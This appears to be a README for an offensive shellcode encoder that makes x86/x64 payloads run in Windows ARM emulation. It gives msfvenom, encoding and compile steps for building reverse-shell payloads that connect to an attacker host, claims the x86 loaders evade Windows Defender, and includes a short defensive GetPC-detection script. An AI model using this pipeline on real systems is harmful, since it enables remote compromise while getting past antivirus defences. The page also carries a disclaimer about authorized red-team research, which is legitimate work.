█████▒█ ██ ██ ▄█▀▄▄▄ ██░ ██ ██▓ ███▄ █ ▄▄▄ ▄▄▄█████▓▓█████ ██ ▄█▀ ██▓ ▒█████
▓██ ▒ ██ ▓██▒ ██▄█▒▒████▄ ▓██░ ██▒▓██▒ ██ ▀█ █ ▒████▄ ▓ ██▒ ▓▒▓█ ▀ ██▄█▒ ▓██▒▒██▒ ██▒
▒████ ░▓██ ▒██░▓███▄░▒██ ▀█▄ ▒██▀▀██░▒██▒ ▓██ ▀█ ██▒▒██ ▀█▄ ▒ ▓██░ ▒░▒███ ▓███▄░ ▒██▒▒██░ ██▒
░▓█▒ ░▓▓█ ░██░▓██ █▄░██▄▄▄▄██ ░▓█ ░██ ░██░ ▓██▒ ▐▌██▒░██▄▄▄▄██ ░ ▓██▓ ░ ▒▓█ ▄ ▓██ █▄ ░██░▒██ ██░
░▒█░ ▒▒█████▓ ▒██▒ █▄▓█ ▓██▒░▓█▒░██▓░██░ ▒██░ ▓██░ ▓█ ▓██▒ ▒██▒ ░ ░▒████▒▒██▒ █▄░██░░ ████▓▒░
▒ ░ ░▒▓▒ ▒ ▒ ▒ ▒▒ ▓▒▒▒ ▓▒█░ ▒ ░░▒░▒░▓ ░ ▒░ ▒ ▒ ▒▒ ▓▒█░ ▒ ░░ ░░ ▒░ ░▒ ▒▒ ▓▒░▓ ░ ▒░▒░▒░
░ ░░▒░ ░ ░ ░ ░▒ ▒░ ▒ ▒▒ ░ ▒ ░▒░ ░ ▒ ░ ░ ░░ ░ ▒░ ▒ ▒▒ ░ ░ ░ ░ ░░ ░▒ ▒░ ▒ ░ ░ ▒ ▒░
░ ░ ░░░ ░ ░ ░ ░░ ░ ░ ▒ ░ ░░ ░ ▒ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░ ▒ ░░ ░ ░ ▒
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░
============[Author:-Xyconix-0xXyc][不可避な適応]============
++++[“Inevitable adaptation”]++++
Proudly Engineered by Swiz Security LLC
++[v.1.0]++
An enhancement to my original SGN XOR Encoder that fixes x86/64 shellcode in emulated Windows ARM Environments (Prism), deemed Fukahi Na Tekio, or "Inevitable Adaptation" in Japanese.
Read about the full research and why I did it here.
For some reason, EIP/RIP would always point to a near-null value, leading to an access violation (a segfault for you Linux guys) because our shellcode's address would be lost somewhere in memory.
This is because the Floating Point Unit (FPU) would not reliably repopulate the shellcode's address when the fnstenv instruction was used (idk, your guess is as good as mine, Windows is weird).
That looks something like this:

```asm
fcmovb st, st(5)   ; Any FPU instruction
fnstenv [esp-0xc]  ; Save FPU state to stack
pop ebp            ; Grab saved EIP from FPU state
```
The solution? A CALL/POP technique that is reliable and works just about anywhere. We simply POP our last known good location into a register and save it for when we are ready to CALL it later.
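Both GetPC idioms above (the fnstenv sequence and its CALL/POP replacement) have fixed byte encodings, which is exactly what a static detection rule keys on. The following is an added example, not code from the encoder or its author: a small Python scanner that flags both idioms in a byte buffer. The opcode patterns are standard x86 encodings; the sample buffers are constructed here.

```python
import re
from typing import List, Tuple

# fnstenv [esp+disp8] encodes as D9 74 24 xx; fnstenv [esp] as D9 34 24.
# re.DOTALL is required so "." also matches a 0x0a displacement byte.
FNSTENV_ESP = re.compile(rb"\xd9(?:\x74\x24.|\x34\x24)", re.DOTALL)

# call $+5 (E8 00 00 00 00) immediately followed by pop r32 (58..5F):
# the next instruction's address is pushed and popped straight into a register.
CALL_POP = re.compile(rb"\xe8\x00\x00\x00\x00[\x58-\x5f]")


def find_getpc(buf: bytes) -> List[Tuple[int, str]]:
    """Return (offset, idiom) hits for both GetPC idioms, sorted by offset.

    Both sequences also occur in some legitimate position-independent code,
    so treat a hit as a triage signal rather than a verdict on its own.
    """
    hits = [(m.start(), "fnstenv") for m in FNSTENV_ESP.finditer(buf)]
    hits += [(m.start(), "call/pop") for m in CALL_POP.finditer(buf)]
    return sorted(hits)


# Constructed samples (not real payloads): the three-instruction FPU stub from
# above (fcmovb st,st(5) ; fnstenv [esp-0xc] ; pop ebp) and a call/pop stub,
# each surrounded by NOP padding.
FPU_STUB = b"\xda\xc5" + b"\xd9\x74\x24\xf4" + b"\x5d"
CALLPOP_STUB = b"\xe8\x00\x00\x00\x00" + b"\x5d"
SAMPLE = b"\x90" * 3 + FPU_STUB + b"\x90" * 4 + CALLPOP_STUB + b"\x90" * 2
CLEAN = b"\x90\x31\xc0\xc3"  # nop ; xor eax,eax ; ret

if __name__ == "__main__":
    for off, kind in find_getpc(SAMPLE):
        print(f"GetPC idiom '{kind}' at offset {off:#x}")
    print("clean sample hits:", find_getpc(CLEAN))
```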
Help/Options
Running with options:
Output:
Verifying different outcomes with each run:
Grab & Compile Loader:
Get a 🐚:
The people asked (actually nobody did, but I wanted to challenge myself further), so I did. This new update absolutely comes "pack-a-punched" right out of the box with things like:
- [✔️] Polymorphic Encoding Technique (different payload every time)
- [✔️] Implemented Linear Feedback Shift Register (LFSR)
- [✔️] Direct C-loader support and guidance for rapid testing
- [✔️] Support for eliminating loops (good for control flow and static AV/EDR evasion) which I deemed "unrolling"
- [✔️] Works with both x86/64 shellcode variants on ARM Windows environments using the native "Prism" emulator
x86 Use Case
1. Generate Shellcode:
```shell
msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACKER_MACHINE_IP> LPORT=1337 -f hex
```
2. Encode it:
```shell
python3 fukahi-na-tekio-encoder.py <place_msfvenom_generated_shellcode_here> --mode noloop --full-loader --compact
```
3. Compile the loader to an .exe:
```shell
i686-w64-mingw32-gcc-15.2.0.exe loader.c -o loader.exe -fno-stack-protector
```
x64 Use Case
1. Generate Shellcode:
```shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_MACHINE_IP> LPORT=1337 -f hex
```
2. Encode it:
```shell
python3 fukahi-na-tekio-encoder.py <place_msfvenom_generated_shellcode_here> --mode noloop --full-loader --compact
```
3. Compile the loader to an .exe:
```shell
gcc loader.c -o loader.exe -fno-stack-protector
```
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATIONAL PURPOSES ONLY
By downloading, using, or distributing this software, you acknowledge and agree to the following:
Authorization Required: You must have explicit, written authorization from the owner of any system you test with this tool. Unauthorized access to computer systems is a federal crime under the Computer Fraud and Abuse Act (CFAA) and similar laws worldwide.
No Liability: Swiz Security and Jacob Swinsinski provide this tool "AS IS" without warranty of any kind. We are NOT responsible or liable for any damages, legal consequences, criminal charges, or misuse arising from the use of this software.
Your Responsibility: You assume full responsibility for your actions. The creators and contributors of this project will not be held accountable for any illegal or unauthorized use.
Intended Use: This tool was developed for legitimate security research, penetration testing, red team operations, and educational purposes only.
Compliance: You agree to comply with all applicable local, state, federal, and international laws and regulations.
If you do not agree to these terms, do not download, use, or distribute this software.
"With great power comes great responsibility."
⚠️ Unfortunately, there is an issue right now that I am trying to figure out as to why x86 loaders bypass Win Def successfully, but x64 loaders do not.
I'll be investigating this further and get back to you guys with an updated version of the encoder when I have time.